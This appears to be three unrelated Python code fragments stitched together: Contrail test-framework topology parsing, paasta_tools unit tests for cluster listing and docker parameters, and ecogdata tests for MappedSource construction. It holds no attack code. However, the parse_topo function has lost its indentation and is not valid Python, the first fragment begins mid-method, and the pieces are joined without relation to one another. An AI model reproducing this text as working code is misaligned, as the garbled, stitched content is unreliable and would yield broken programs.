        host_dict = self.host_data[host]
        if service.lower() == 'vrouter':
            if self.contrail_configs.get('L3MH_CIDR', None):
                # L3 multihoming: use the host address itself.
                return host
            # vrouter binds to the vhost0 interface address.
            ip = self.get_ips_of_host(host, 'vhost0')[0]
            self.host_data[host]['control_data_ip'] = ip
            return ip
        elif service.lower() == 'control':
            ip_list = self.contrail_configs.get('CONTROL_NODES') or \
                self.contrail_configs.get('CONTROLLER_NODES') or ''
            ips = self.get_ips_of_host(host)
            # Pick the first configured control IP present on this host.
            for ip in ip_list.split(','):
                if ip in ips:
                    self.host_data[host]['control_data_ip'] = ip
                    return ip
        elif service.lower() == 'openstack':
            # Per-host NIC override wins over the orchestrator-level one.
            nic = host_dict['roles']['openstack'].get('network_interface') \
                if host_dict['roles']['openstack'] else \
                self.orchestrator_configs.get('network_interface')
            if not nic:
                return host
            ips = self.get_ips_of_host(host, nic)
            if not ips and 'vrouter' in host_dict['roles']:
                # Combined compute node: fall back to the vhost0 address.
                ips = self.get_ips_of_host(host, 'vhost0')
            if ips:
                return ips[0]
            return host
        else:
            # Generic case: intersect the host's IPs with <SERVICE>_NODES
            # (CONTROLLER_NODES as fallback) from the contrail configs.
            service_nodes = service.upper()+'_NODES' if service else ''
            if not self.contrail_configs.get(service_nodes):
                service_nodes = 'CONTROLLER_NODES'
            if self.contrail_configs.get(service_nodes):
                cfg_ips = set(self.contrail_configs[service_nodes].split(','))
                ips = set(self.get_ips_of_host(host))
                if ips.intersection(cfg_ips):
                    return list(ips.intersection(cfg_ips))[0]
            return host
    def get_service_ip(self, host, service='CONTROLLER'):
        """Public wrapper: IP on *host* for *service* (see _get_ip_for_service)."""
        return self._get_ip_for_service(host, service)
    def get_service_name(self, host, service_ip):
        """Return (and cache) the hostname that *service_ip* resolves to on
        *host*, falling back to the host's own name when resolution fails."""
        host_data = self.host_data[host]
        if service_ip not in host_data.get('service_name'):
            service_name = get_hostname_by_ip(host,
                                              service_ip,
                                              username=host_data['username'],
                                              password=host_data['password'],
                                              as_sudo=True,
                                              logger=self.logger)
            # Fall back to the host's own name when lookup returns nothing.
            host_data['service_name'][service_ip] = service_name or \
                host_data['name']
        return host_data['service_name'][service_ip]
def parse_topo(self):
self.host_names = []
self.cfgm_ip = ''
self.cfgm_ips = []
self.cfgm_control_ips = []
self.cfgm_names = []
self.openstack_ip = ''
self.openstack_ips = []
self.openstack_control_ips = []
self.openstack_names = []
self.collector_ip = ''
self.collector_ips = []
self.collector_control_ips = []
self.collector_names = []
self.alarmgen_nrs = 0
self.database_ips = []
self.database_names = []
self.database_control_ips = []
self.compute_ips = []
self.compute_names = []
self.contrail_service_nodes = []
self.compute_control_ips = []
self.compute_info = {}
self.bgp_ips = []
self.bgp_control_ips = []
self.bgp_names = []
self.host_ips = []
self.webui_ips = []
self.webui_control_ips = []
self.kube_manager_ips = []
self.kube_manager_control_ips = []
self.k8s_master_ip = ""
self.k8s_slave_ips = []
self.policy_generator_ips = []
self.policy_generator_control_ips = []
self.dpdk_ips = []
self.host_data = {}
self.tor = {}
self.tor_hosts_data = {}
self.physical_routers_data = {}
self.vcenter_compute_ips= []
self.qos_queue = []
self.qos_queue_pg_properties = []
self.ns_agilio_vrouter_data = {}
self.virtio = None
self.esxi_vm_ips = {}
self.vgw_data = {}
self.hypervisors = {}
self.is_dpdk_cluster = False
self.is_sriov_cluster = False
provider_configs = (self.config.get('provider_config') or {}).get('bms') or {}
username = provider_configs.get('ssh_user') or 'root'
password = provider_configs.get('ssh_pwd') or '<PASSWORD>'
self.domainsuffix = provider_configs.get('domainsuffix') or 'englab.juniper.net'
for host, values in (self.config.get('instances') or {}).items():
roles = values.get('roles') or {}
host_data = dict()
host_data['host_ip'] = values['ip']
if 'openstack_control' in roles and not 'openstack' in roles:
roles.update({'openstack': {}})
host_data['roles'] = roles
host_data['username'] = username
host_data['password'] = password
host_data['service_name'] = dict()
self.host_data[host_data['host_ip']] = host_data
hostname = self.run_cmd_on_server(host_data['host_ip'], 'hostname')
host_fqname = self.run_cmd_on_server(host_data['host_ip'], 'hostname -f')
if hostname.endswith('.novalocal'):
hostname = hostname.rstrip('.novalocal')
self.host_names.append(hostname)
self.host_ips.append(host_data['host_ip'])
host_data['name'] = hostname
host_data['fqname'] = host_fqname
self.host_data[host_fqname] = self.host_data[hostname] = host_data
self._check_containers(host_data)
host_data_ip = host_control_ip = host_data['host_ip']
qos_queue_per_host, qos_queue_pg_properties_per_host = \
self._process_qos_data_yml(host_data['host_ip'])
if qos_queue_per_host:
self.qos_queue.append(qos_queue_per_host)
if qos_queue_pg_properties_per_host:
self.qos_queue_pg_properties.append(qos_queue_pg_properties_per_host)
if 'openstack' in roles and ( 'nova' in host_data['containers'] or self.deployer == 'juju'):
self.openstack_ip = host_data['host_ip']
self.openstack_ips.append(host_data['host_ip'])
service_ip = self.get_service_ip(host_data['host_ip'], 'openstack')
self.host_data[service_ip] = host_data
self.openstack_control_ips.append(service_ip)
self.openstack_control_ip = service_ip
service_name = self.get_service_name(host_data['host_ip'], service_ip)
self.openstack_names.append(service_name)
self.host_data[service_name] = host_data
if 'config' in roles:
service_ip = self.get_service_ip(host_data['host_ip'], 'config')
self.host_data[service_ip] = host_data
self.cfgm_ip = service_ip
self.cfgm_ips.append(service_ip)
self.cfgm_control_ips.append(service_ip)
self.cfgm_control_ip = service_ip
service_name = self.get_service_name(host_data['host_ip'], service_ip)
self.cfgm_names.append(service_name)
self.host_data[service_name] = host_data
self.hostname = hostname
if 'vrouter' in roles:
data_ip = self.get_service_ip(host_data['host_ip'], 'vrouter')
#For single-interface , setting hostname to hostfqname to make vcenter
#scenario work
if data_ip != host_data['host_ip']:
host_data['name'] = hostname
else:
#not able to get host_fqname from singleinterface vcenter contrailvm
if self.deployer == 'rhosp' and len(hostname.split('.')) > 1:
host_data['name'] = hostname
else:
host_data['name'] = '.'.join([hostname,self.domainsuffix])
#
if roles['vrouter'] and roles['vrouter'].get('TSN_EVPN_MODE'):
self.contrail_service_nodes.append(hostname)
else:
self.compute_ips.append(host_data['host_ip'])
service_name = self.get_service_name(host_data['host_ip'], data_ip)
self.compute_names.append(service_name)
self.compute_info[service_name] = host_data['host_ip']
self.compute_control_ips.append(data_ip)
self.host_data[service_name] = host_data
if service_name != hostname:
self.compute_info[hostname] = host_data['host_ip']
if roles['vrouter']:
if roles['vrouter'].get('AGENT_MODE') == 'dpdk':
host_data['is_dpdk'] = True
self.is_dpdk_cluster = True
self.dpdk_ips.append(host_data['host_ip'])
host_data_ip = host_control_ip = data_ip
if 'control' in roles:
service_ip = self.get_service_ip(host_data['host_ip'], 'control')
self.bgp_ips.append(host_data['host_ip'])
self.bgp_control_ips.append(service_ip)
service_name = self.get_service_name(host_data['host_ip'], service_ip)
self.bgp_names.append(service_name)
host_data_ip = host_control_ip = service_ip
self.host_data[service_name] = host_data
if 'webui' in roles:
service_ip = self.get_service_ip(host_data['host_ip'], 'webui')
| |
'Id': 'ef978820f195dede62e206bbd41568463ab2b79260bc63835a72154fe7e196a2',
'Size': 0,
},
]
assert utils.check_docker_image('test_service', 'tag2') is False
@mock.patch('paasta_tools.utils.build_docker_image_name', autospec=True)
def test_check_docker_image_true(mock_build_docker_image_name):
    """check_docker_image returns True when a local image carries the expected tag."""
    service = 'fake_app'
    commit = 'fake_commit'
    mock_build_docker_image_name.return_value = 'fake-registry/services-foo'
    expected_tag = utils.build_docker_tag(service, commit)
    image_record = {
        'Created': 1425430339,
        'VirtualSize': 250344331,
        'ParentId': '1111',
        'RepoTags': [expected_tag],
        'Id': 'ef978820f195dede62e206bbd41568463ab2b79260bc63835a72154fe7e196a2',
        'Size': 0,
    }
    with mock.patch('paasta_tools.utils.get_docker_client', autospec=True) as mock_docker:
        mock_docker.return_value.images.return_value = [image_record]
        assert utils.check_docker_image(service, commit) is True
def test_remove_ansi_escape_sequences():
    """Stripping ANSI color codes yields the original plain text."""
    expected = 'blackandwhite'
    wrapped = '\033[34m' + expected + '\033[0m'
    assert utils.remove_ansi_escape_sequences(wrapped) == expected
def test_missing_cluster_configs_are_ignored():
    """Configs that do not map to real clusters produce an empty result."""
    soa_dir = '/nail/etc/services'
    cluster_configs = [
        '/nail/etc/services/service1/marathon-cluster1.yaml',
        '/nail/etc/services/service2/chronos-cluster2.yaml',
    ]
    with mock.patch(
        'os.path.join', autospec=True, return_value='%s/*' % soa_dir,
    ) as mock_join_path, mock.patch(
        'glob.glob', autospec=True, return_value=cluster_configs,
    ) as mock_glob:
        assert utils.list_clusters(soa_dir=soa_dir) == []
        mock_join_path.assert_called_once_with(soa_dir, '*')
        mock_glob.assert_called_once_with('%s/*/*.yaml' % soa_dir)
def test_list_clusters_no_service_given_lists_all_of_them():
    """Without a service argument, list_clusters returns every deployed cluster."""
    deploy_files = [
        ['cluster1', '/nail/etc/services/service1/marathon-cluster1.yaml'],
        ['cluster2', '/nail/etc/services/service1/chronos-cluster2.yaml'],
    ]
    with mock.patch(
        'paasta_tools.utils.get_soa_cluster_deploy_files', autospec=True,
        return_value=deploy_files,
    ):
        result = utils.list_clusters(soa_dir='/nail/etc/services')
        assert result == ['cluster1', 'cluster2']
def test_list_clusters_with_service():
    """Passing a service restricts the deploy-file scan but still returns its clusters."""
    soa_dir = '/nail/etc/services'
    service = 'fake_service'
    deploy_files = [
        ['cluster1', '/nail/etc/services/service1/marathon-cluster1.yaml'],
        ['cluster2', '/nail/etc/services/service1/chronos-cluster2.yaml'],
    ]
    with mock.patch(
        'paasta_tools.utils.get_soa_cluster_deploy_files', autospec=True, return_value=deploy_files,
    ):
        assert utils.list_clusters(service, soa_dir) == ['cluster1', 'cluster2']
def test_list_clusters_ignores_bogus_clusters():
    """Bogus cluster names (PROD, SHARED) are filtered out of the listed clusters."""
    fake_soa_dir = '/nail/etc/services'
    fake_service = 'fake_service'
    fake_cluster_configs = [
        '/nail/etc/services/service1/marathon-cluster1.yaml',
        '/nail/etc/services/service1/marathon-PROD.yaml',
        '/nail/etc/services/service1/chronos-cluster2.yaml',
        '/nail/etc/services/service1/chronos-SHARED.yaml',
    ]
    expected = ['cluster1', 'cluster2']
    with mock.patch(
        'os.path.join', autospec=True, return_value=f'{fake_soa_dir}/{fake_service}',
    ), mock.patch(
        'glob.glob', autospec=True, return_value=fake_cluster_configs,
    ), mock.patch(
        # BUG FIX: the original passed `path=mock.mock_open(read_data=...)`, which
        # mock.patch treats as a plain attribute-configuration kwarg -- it only set a
        # `.path` attribute on the replacement MagicMock and silently discarded the
        # mock_open (and its read_data).  Pass the mock_open object as the
        # replacement (`new`, second positional argument) so reads actually see
        # "fakedata".
        'builtins.open', mock.mock_open(read_data="fakedata"), autospec=None,
    ):
        actual = utils.list_clusters(service=fake_service)
        assert actual == expected
def test_list_all_instances_for_service():
    """Instances from every cluster are collected into a single set."""
    service = 'fake_service'
    clusters = ['fake_cluster']
    instances = [(service, 'instance1'), (service, 'instance2')]
    with mock.patch(
        'paasta_tools.utils.list_clusters', autospec=True, return_value=clusters,
    ) as mock_list_clusters, mock.patch(
        'paasta_tools.utils.get_service_instance_list', autospec=True, return_value=instances,
    ) as mock_service_instance_list:
        assert utils.list_all_instances_for_service(service) == {'instance1', 'instance2'}
        mock_list_clusters.assert_called_once_with(service, soa_dir=mock.ANY)
        mock_service_instance_list.assert_called_once_with(service, clusters[0], None, soa_dir=mock.ANY)
def test_get_service_instance_list():
    """Each instance is reported once per instance type (four config files are read)."""
    service = 'hint'
    cluster = '16floz'
    soa_dir = '/nail/home/hipster'
    job_config: Dict[str, Dict] = {'unsweet': {}, 'water': {}}
    # one (service, instance) pair per instance type
    expected = [(service, 'unsweet')] * 4 + [(service, 'water')] * 4
    with mock.patch(
        'paasta_tools.utils.service_configuration_lib.read_extra_service_information', autospec=True,
        return_value=job_config,
    ) as read_extra_info_patch:
        actual = utils.get_service_instance_list(service, cluster, soa_dir=soa_dir)
        read_extra_info_patch.assert_any_call(service, 'marathon-16floz', soa_dir=soa_dir)
        read_extra_info_patch.assert_any_call(service, 'chronos-16floz', soa_dir=soa_dir)
        read_extra_info_patch.assert_any_call(service, 'paasta_native-16floz', soa_dir=soa_dir)
        assert read_extra_info_patch.call_count == 4
        assert sorted(expected) == sorted(actual)
def test_get_service_instance_list_ignores_underscore():
    """Instances whose names start with '_' are excluded from the instance list."""
    service = 'hint'
    cluster = '16floz'
    soa_dir = '/nail/home/hipster'
    job_config: Dict[str, Dict] = {'unsweet': {}, '_ignore_me': {}}
    # only the non-underscore instance survives, once per instance type
    expected = [(service, 'unsweet')] * 4
    with mock.patch(
        'paasta_tools.utils.service_configuration_lib.read_extra_service_information', autospec=True,
        return_value=job_config,
    ):
        actual = utils.get_service_instance_list(service=service, cluster=cluster, soa_dir=soa_dir)
        assert sorted(expected) == sorted(actual)
def test_get_services_for_cluster():
    """All (service, instance) pairs under the soa dir are collected for the cluster."""
    cluster = 'honey_bunches_of_oats'
    soa_dir = 'completely_wholesome'
    instance_batches = [
        [
            ('fake_service1', 'this_is_testing'),
            ('fake_service1', 'all_the_things'),
        ],
        [
            ('fake_service2', 'my_nerf_broke'),
        ],
    ]
    # batches are popped from the end, so service2's batch comes first
    expected = instance_batches[1] + instance_batches[0]
    with mock.patch(
        'os.path.abspath', autospec=True, return_value='chex_mix',
    ) as abspath_patch, mock.patch(
        'os.listdir', autospec=True, return_value=['dir1', 'dir2'],
    ) as listdir_patch, mock.patch(
        'paasta_tools.utils.get_service_instance_list',
        side_effect=lambda a, b, c, d: instance_batches.pop(), autospec=True,
    ) as get_instances_patch:
        assert utils.get_services_for_cluster(cluster, soa_dir=soa_dir) == expected
        abspath_patch.assert_called_once_with(soa_dir)
        listdir_patch.assert_called_once_with('chex_mix')
        get_instances_patch.assert_any_call('dir1', cluster, None, soa_dir)
        get_instances_patch.assert_any_call('dir2', cluster, None, soa_dir)
        assert get_instances_patch.call_count == 2
def test_get_services_for_cluster_ignores_underscore():
    """Instances with a leading underscore are dropped from the cluster listing."""
    cluster = 'honey_bunches_of_oats'
    soa_dir = 'completely_wholesome'
    instance_batches = [
        [
            ('fake_service1', 'this_is_testing'),
            ('fake_service1', 'all_the_things'),
            ('fake_service1', '_ignore_me'),
        ],
        [
            ('fake_service2', 'my_nerf_broke'),
        ],
    ]
    # batches pop from the end; the '_ignore_me' instance must be filtered out
    expected = [
        ('fake_service2', 'my_nerf_broke'),
        ('fake_service1', 'this_is_testing'),
        ('fake_service1', 'all_the_things'),
    ]
    with mock.patch(
        'os.path.abspath', autospec=True, return_value='chex_mix',
    ), mock.patch(
        'os.listdir', autospec=True, return_value=['dir1', 'dir2'],
    ), mock.patch(
        'paasta_tools.utils.get_service_instance_list',
        side_effect=lambda a, b, c, d: instance_batches.pop(), autospec=True,
    ):
        assert utils.get_services_for_cluster(cluster, soa_dir=soa_dir) == expected
def test_color_text():
    """color_text wraps the string in the color code and a trailing reset."""
    red = utils.PaastaColors.RED
    reset = utils.PaastaColors.DEFAULT
    assert utils.PaastaColors.color_text(red, "hi") == red + "hi" + reset
def test_color_text_nested():
    """The outer color is re-opened after an inner color's reset code."""
    red = utils.PaastaColors.RED
    blue = utils.PaastaColors.BLUE
    reset = utils.PaastaColors.DEFAULT
    expected = red + "red" + blue + "blue" + reset + red + "red" + reset
    actual = utils.PaastaColors.color_text(red, "red%sred" % utils.PaastaColors.blue("blue"))
    assert actual == expected
def test_DeploymentsJson_read():
    """load_deployments_json opens the service's deployments.json and wraps the 'v1' payload."""
    fake_dir = '/var/dir_of_fake'
    fake_json = {
        'v1': {
            'no_srv:blaster': {
                'docker_image': 'test_rocker:9.9',
                'desired_state': 'start',
                'force_bounce': None,
            },
            'dont_care:about': {
                'docker_image': 'this:guy',
                'desired_state': 'stop',
                'force_bounce': '12345',
            },
        },
    }
    file_mock = mock.mock_open()
    with mock.patch(
        'builtins.open', file_mock, autospec=None,
    ) as open_patch, mock.patch(
        'json.load', autospec=True, return_value=fake_json,
    ) as json_patch, mock.patch(
        'paasta_tools.utils.os.path.isfile', autospec=True, return_value=True,
    ):
        actual = utils.load_deployments_json('fake_service', fake_dir)
        open_patch.assert_called_once_with('/var/dir_of_fake/fake_service/deployments.json')
        json_patch.assert_called_once_with(file_mock.return_value.__enter__.return_value)
        assert actual == utils.DeploymentsJsonV1(fake_json['v1'])
def test_get_running_mesos_docker_containers():
    """Only containers recognized as mesos containers are returned."""
    mesos_container = {
        "Status": "Up 2 hours",
        "Names": ['/mesos-legit.e1ad42eb-3ed7-4c9b-8711-aff017ef55a5'],
        "Id": "05698f4156c4f30c8dcd747f7724b14c9af7771c9a4b96fdd6aa37d6419a12a3",
    }
    other_container = {
        "Status": "Up 3 days",
        "Names": ['/definitely_not_meeeeesos-.6d2fb3aa-2fef-4f98-8fed-df291481e91f'],
        "Id": "ae66e2c3fe3c4b2a7444212592afea5cc6a4d8ca70ee595036b19949e00a257c",
    }
    with mock.patch("paasta_tools.utils.get_docker_client", autospec=True) as mock_docker:
        mock_docker.return_value.containers.return_value = [mesos_container, other_container]
        assert len(utils.get_running_mesos_docker_containers()) == 1
def test_run_cancels_timer_thread_on_keyboard_interrupt():
    """The timeout timer is cancelled when reading subprocess output is interrupted."""
    mock_process = mock.Mock()
    mock_process.stdout.readline.side_effect = KeyboardInterrupt
    mock_timer = mock.Mock()
    with mock.patch(
        'paasta_tools.utils.Popen', autospec=True, return_value=mock_process,
    ), mock.patch(
        'paasta_tools.utils.threading.Timer', autospec=True, return_value=mock_timer,
    ):
        with raises(KeyboardInterrupt):
            utils._run('sh echo foo', timeout=10)
        assert mock_timer.cancel.call_count == 1
def test_run_returns_when_popen_fails():
    """An OSError from Popen is reported as (errno, message) instead of propagating."""
    with mock.patch(
        'paasta_tools.utils.Popen', autospec=True, side_effect=OSError(1234, 'fake error'),
    ):
        return_code, output = utils._run('nonexistant command', timeout=10)
    assert return_code == 1234
    assert 'fake error' in output
@pytest.mark.parametrize(
    ('dcts', 'expected'),
    [
        # already sorted
        ([{'a': 'b'}, {'c': 'd'}], [{'a': 'b'}, {'c': 'd'}]),
        # reverse order gets sorted
        ([{'c': 'd'}, {'a': 'b'}], [{'a': 'b'}, {'c': 'd'}]),
        # a dict that is a strict superset sorts after its subset
        ([{'a': 'b', 'c': 'd'}, {'a': 'b'}], [{'a': 'b'}, {'a': 'b', 'c': 'd'}]),
    ],
)
def test_sort_dcts(dcts, expected):
    """sort_dicts orders dicts deterministically."""
    assert utils.sort_dicts(dcts) == expected
class TestInstanceConfig:
    """Tests for utils.InstanceConfig resource getters and docker parameter formatting.

    Notes on expected values (derived from the assertions below, not verified
    against the implementation -- confirm in paasta_tools.utils):
      * cpu-quota appears to be cfs_period_us * cpus * (1 + cpu_burst_pct / 100),
        with a large default burst (cpus=1, period=100000 -> quota 1000000).
      * mem-swap appears to be ceil(mem) + 64 megabytes.
    """
    def test_get_monitoring(self):
        """get_monitoring() returns the raw 'monitoring' dict from config."""
        fake_info = {'fake_key': 'fake_value'}
        assert utils.InstanceConfig(
            service='',
            cluster='',
            instance='',
            config_dict={'monitoring': fake_info},
            branch_dict=None,
        ).get_monitoring() == fake_info
    def test_get_cpus_in_config(self):
        """Configured 'cpus' is returned verbatim (even nonsensical values)."""
        fake_conf = utils.InstanceConfig(
            service='',
            cluster='',
            instance='',
            config_dict={'cpus': -5},
            branch_dict=None,
        )
        assert fake_conf.get_cpus() == -5
    def test_get_cpus_in_config_float(self):
        """Fractional 'cpus' values are preserved."""
        fake_conf = utils.InstanceConfig(
            service='',
            cluster='',
            instance='',
            config_dict={'cpus': .66},
            branch_dict=None,
        )
        assert fake_conf.get_cpus() == .66
    def test_get_cpus_default(self):
        """Without a 'cpus' key the default is 0.25 cores."""
        fake_conf = utils.InstanceConfig(
            service='',
            cluster='',
            instance='',
            config_dict={},
            branch_dict=None,
        )
        assert fake_conf.get_cpus() == .25
    def test_get_mem_in_config(self):
        """Configured 'mem' is returned verbatim."""
        fake_conf = utils.InstanceConfig(
            service='',
            instance='',
            cluster='',
            config_dict={'mem': -999},
            branch_dict=None,
        )
        assert fake_conf.get_mem() == -999
    def test_get_mem_default(self):
        """Without a 'mem' key the default is 1024 MB."""
        fake_conf = utils.InstanceConfig(
            service='',
            instance='',
            cluster='',
            config_dict={},
            branch_dict=None,
        )
        assert fake_conf.get_mem() == 1024
    def test_zero_cpu_burst(self):
        """cpu_burst_pct=0 pins the quota to exactly one period per cpu."""
        fake_conf = utils.InstanceConfig(
            service='fake_name',
            cluster='',
            instance='fake_instance',
            config_dict={'cpu_burst_pct': 0, 'cpus': 1},
            branch_dict=None,
        )
        assert fake_conf.get_cpu_quota() == 100000
    def test_format_docker_parameters_default(self):
        """Default formatting emits swap, cpu period/quota, and identifying labels."""
        fake_conf = utils.InstanceConfig(
            service='fake_name',
            cluster='',
            instance='fake_instance',
            config_dict={
                'cpus': 1,
                'mem': 1024,
            },
            branch_dict=None,
        )
        # quota 1000000 with period 100000 implies the default burst allows 10x --
        # TODO confirm the default cpu_burst_pct in paasta_tools.utils
        assert fake_conf.format_docker_parameters() == [
            {"key": "memory-swap", "value": '1088m'},
            {"key": "cpu-period", "value": "100000"},
            {"key": "cpu-quota", "value": "1000000"},
            {"key": "label", "value": "paasta_service=fake_name"},
            {"key": "label", "value": "paasta_instance=fake_instance"},
        ]
    def test_format_docker_parameters_non_default(self):
        """Custom burst/period, ulimits, and cap_add all show up as docker parameters."""
        fake_conf = utils.InstanceConfig(
            service='fake_name',
            cluster='',
            instance='fake_instance',
            config_dict={
                'cpu_burst_pct': 200,
                'cfs_period_us': 200000,
                'cpus': 1,
                'mem': 1024,
                'ulimit': {
                    'nofile': {'soft': 1024, 'hard': 2048},
                    'nice': {'soft': 20},
                },
                'cap_add': ['IPC_LOCK', 'SYS_PTRACE'],
            },
            branch_dict=None,
        )
        # quota 600000 = 200000 period * 1 cpu * (1 + 200% burst)
        assert fake_conf.format_docker_parameters() == [
            {"key": "memory-swap", "value": '1088m'},
            {"key": "cpu-period", "value": "200000"},
            {"key": "cpu-quota", "value": "600000"},
            {"key": "label", "value": "paasta_service=fake_name"},
            {"key": "label", "value": "paasta_instance=fake_instance"},
            {"key": "ulimit", "value": "nice=20"},
            {"key": "ulimit", "value": "nofile=1024:2048"},
            {"key": "cap-add", "value": "IPC_LOCK"},
            {"key": "cap-add", "value": "SYS_PTRACE"},
        ]
    def test_full_cpu_burst(self):
        """cpu_burst_pct=100 doubles the base quota."""
        fake_conf = utils.InstanceConfig(
            service='fake_name',
            cluster='',
            instance='fake_instance',
            config_dict={'cpu_burst_pct': 100, 'cpus': 1},
            branch_dict=None,
        )
        assert fake_conf.get_cpu_quota() == 200000
    def test_get_mem_swap_int(self):
        """Swap is mem plus a 64m headroom (50 + 64 = 114)."""
        fake_conf = utils.InstanceConfig(
            service='',
            instance='',
            cluster='',
            config_dict={
                'mem': 50,
            },
            branch_dict=None,
        )
        assert fake_conf.get_mem_swap() == "114m"
    def test_get_mem_swap_float_rounds_up(self):
        """Fractional mem is rounded up before adding headroom (51 + 64 = 115)."""
        fake_conf = utils.InstanceConfig(
            service='',
            instance='',
            cluster='',
            config_dict={
                'mem': 50.4,
            },
            branch_dict=None,
        )
        assert fake_conf.get_mem_swap() == "115m"
    def test_get_disk_in_config(self):
        """Configured 'disk' is returned verbatim."""
        fake_conf = utils.InstanceConfig(
            service='',
            instance='',
            cluster='',
            config_dict={'disk': -999},
            branch_dict=None,
        )
        assert fake_conf.get_disk() == -999
    def test_get_disk_default(self):
        """Without a 'disk' key the default is 1024 MB."""
        fake_conf = utils.InstanceConfig(
            service='',
            instance='',
            cluster='',
            config_dict={},
            branch_dict=None,
        )
        assert fake_conf.get_disk() == 1024
    def test_get_gpus_in_config(self):
        """Configured 'gpus' is returned verbatim."""
        fake_conf = utils.InstanceConfig(
            service='',
            instance='',
            cluster='',
            config_dict={'gpus': -123},
            branch_dict=None,
        )
        assert fake_conf.get_gpus() == -123
    def test_get_gpus_default(self):
        """Without a 'gpus' key the default is 0."""
        fake_conf = utils.InstanceConfig(
            service='',
            instance='',
            cluster='',
            config_dict={},
            branch_dict=None,
        )
        assert fake_conf.get_gpus() == 0
    def test_get_ulimit_in_config(self):
        """Each configured ulimit becomes a docker 'ulimit' parameter, soft[:hard]."""
        fake_conf = utils.InstanceConfig(
            service='',
            instance='',
            cluster='',
            config_dict={
                'ulimit': {
                    'nofile': {'soft': 1024, 'hard': 2048},
                    'nice': {'soft': 20},
                },
            },
            branch_dict=None,
        )
        assert list(fake_conf.get_ulimit()) == [
            {"key": "ulimit", "value": "nice=20"},
            {"key": "ulimit", "value": "nofile=1024:2048"},
        ]
    def test_get_ulimit_default(self):
        """No ulimit config yields no ulimit parameters."""
        fake_conf = utils.InstanceConfig(
            service='',
            instance='',
            cluster='',
            config_dict={},
            branch_dict=None,
        )
        assert list(fake_conf.get_ulimit()) == []
    def test_get_cap_add_in_config(self):
        """Each configured capability becomes a docker 'cap-add' parameter."""
        fake_conf = utils.InstanceConfig(
            service='',
            instance='',
            cluster='',
            config_dict={
                'cap_add': ['IPC_LOCK', 'SYS_PTRACE'],
            },
            branch_dict=None,
        )
        assert list(fake_conf.get_cap_add()) == [
            {"key": "cap-add", "value": "IPC_LOCK"},
            {"key": "cap-add", "value": "SYS_PTRACE"},
        ]
    def test_get_cap_add_default(self):
        """No cap_add config yields no cap-add parameters."""
        fake_conf = utils.InstanceConfig(
            service='',
            instance='',
            cluster='',
            config_dict={},
            branch_dict=None,
        )
        assert list(fake_conf.get_cap_add()) == []
    def test_deploy_group_default(self):
        """Default deploy group is '<cluster>.<instance>'."""
        fake_conf = utils.InstanceConfig(
            service='',
            instance='fake_instance',
            cluster='fake_cluster',
            config_dict={},
            branch_dict=None,
        )
        assert fake_conf.get_deploy_group() == 'fake_cluster.fake_instance'
    def test_deploy_group_if_config(self):
        """An explicit 'deploy_group' overrides the default."""
        fake_conf = utils.InstanceConfig(
            service='',
            instance='',
            cluster='',
            config_dict={'deploy_group': 'fake_deploy_group'},
            branch_dict=None,
        )
        assert fake_conf.get_deploy_group() == 'fake_deploy_group'
    def test_deploy_group_string_interpolation(self):
        """'{cluster}' in deploy_group is interpolated with the instance's cluster."""
        fake_conf = utils.InstanceConfig(
            service='',
            instance='',
            cluster='fake_cluster',
            config_dict={'deploy_group': 'cluster_is_{cluster}'},
            branch_dict=None,
        )
        assert fake_conf.get_deploy_group() == 'cluster_is_fake_cluster'
    def test_get_cmd_default(self):
        """Without a 'cmd' key, get_cmd() returns None."""
        fake_conf = utils.InstanceConfig(
            service='',
            cluster='',
            instance='',
            config_dict={},
            branch_dict=None,
        )
        assert fake_conf.get_cmd() is None
| |
<reponame>miketrumpis/ecogdata<gh_stars>0
import os
import pytest
import numpy as np
from ecogdata.datasource.array_abstractions import HDF5Buffer
from ecogdata.datasource.memmap import MappedSource, MemoryBlowOutError
from ecogdata.datasource.basic import PlainArraySource
from .test_array_abstractions import _create_hdf5, _create_buffer, _create_binder
def test_basic_construction():
    """MappedSource exposes shape, a full channel mask, and the aligned aux arrays."""
    aux_arrays = ('test1', 'test2')
    buffer, data = _create_buffer(aux_arrays=aux_arrays)
    # hacky way to get h5py.File object...
    hdf = buffer.file_array.file
    aligned = {name: HDF5Buffer(hdf[name]) for name in aux_arrays}
    map_source = MappedSource(buffer, aligned_arrays=aligned)
    shape = data.shape
    assert map_source.shape == shape, 'Shape wrong'
    assert map_source.binary_channel_mask.sum() == shape[0], 'Wrong number of active channels'
    for field in aux_arrays:
        assert hasattr(map_source, field), 'Aux field {} not preserved'.format(field)
        assert getattr(map_source, field).shape[1] == shape[1], 'aligned field {} wrong length'.format(field)
    # repeat for transpose
    map_source = MappedSource(buffer, aligned_arrays=aligned, transpose=True)
    assert map_source.shape == shape[::-1], 'Shape wrong in transpose'
    assert map_source.binary_channel_mask.sum() == shape[1], 'Wrong number of active channels in transpose'
def test_basic_construction_binder():
    """A binder-backed MappedSource reports the bound shape and a full channel mask."""
    buffer, data = _create_binder(axis=1)
    shape = data.shape
    source = MappedSource(buffer)
    assert source.shape == shape, 'Shape wrong'
    assert source.binary_channel_mask.sum() == shape[0], 'Wrong number of active channels'
    # repeat for transpose
    source = MappedSource(buffer, transpose=True)
    assert source.shape == shape[::-1], 'Shape wrong in transpose'
    assert source.binary_channel_mask.sum() == shape[1], 'Wrong number of active channels in transpose'
def test_construction_from_single_source():
    """from_hdf_sources builds a MappedSource with aux arrays from one HDF5 file."""
    aux_arrays = ('test1', 'test2')
    hdf_file = _create_hdf5(aux_arrays=aux_arrays)
    shape = hdf_file['data'].shape
    map_source = MappedSource.from_hdf_sources(hdf_file, 'data', aligned_arrays=aux_arrays)
    assert map_source.shape == shape, 'Shape wrong'
    assert map_source.binary_channel_mask.sum() == shape[0], 'Wrong number of active channels'
    for field in aux_arrays:
        assert hasattr(map_source, field), 'Aux field {} not preserved'.format(field)
        assert getattr(map_source, field).shape[1] == shape[1], 'aligned field {} wrong length'.format(field)
    # repeat for transpose
    map_source = MappedSource.from_hdf_sources(hdf_file, 'data', aligned_arrays=aux_arrays, transpose=True)
    assert map_source.shape == shape[::-1], 'Shape wrong in transpose'
    assert map_source.binary_channel_mask.sum() == shape[1], 'Wrong number of active channels in transpose'
def test_construction_from_sources():
    """Multiple HDF5 sources concatenate along time (or channels when transposed)."""
    aux_arrays = ('test1', 'test2')
    files = [_create_hdf5(aux_arrays=aux_arrays) for _ in range(3)]
    single_shape = files[0]['data'].shape
    # three sources stack along the time axis
    shape = (single_shape[0], 3 * single_shape[1])
    map_source = MappedSource.from_hdf_sources(files, 'data', aligned_arrays=aux_arrays)
    assert map_source.shape == shape, 'Shape wrong'
